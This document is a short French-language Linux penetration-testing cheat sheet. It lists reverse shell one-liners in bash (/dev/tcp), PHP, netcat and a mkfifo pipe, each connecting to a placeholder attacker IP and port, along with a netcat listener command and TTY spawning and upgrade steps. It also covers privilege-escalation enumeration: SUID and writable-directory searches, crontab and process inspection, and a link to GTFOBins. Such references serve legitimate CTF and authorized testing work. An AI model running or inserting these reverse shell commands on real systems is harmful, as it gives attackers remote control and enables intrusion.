Cheat sheet – Linux

Reverse shell:

Ouvrir un port coté attaquant: nc -lvp [PORT]

  • bash -i >& /dev/tcp/[IP]/[PORT] 0>&1
  • php -r '$s=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
  • nc [IP] [PORT] -e /bin/bash
  • rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc [IP] [PORT] > f

Plus de méthodes ici

Spawn TTY:

  • python -c 'import pty; pty.spawn("/bin/sh")'
  • SHELL=/bin/bash script -q /dev/null

Plus de méthodes ici

Upgrade reverse shell:

  1. Ctrl + Z
  2. stty raw -echo
  3. fg

Énumération :

  • Liste les répertoires accessibles en écriture: find / -type d -writable 2> /dev/null
  • Liste des SUID: find / -type f -perm /6000 -ls 2>/dev/null

Script pour l'énumération :

Voir la version du système:

  • Version du noyau: uname -mr
  • Version de l'OS: lsb_release -a

Voir les processus qui sont executés en arrière plan:

  • pspy
  • Voir si il y a une crontab  de configurée: cat /etc/crontab
 

Voir les ports en écoute:

netstat -tulpn

Exploitation des droits SUDO/SUID sur des binaires connu:

https://gtfobins.github.io/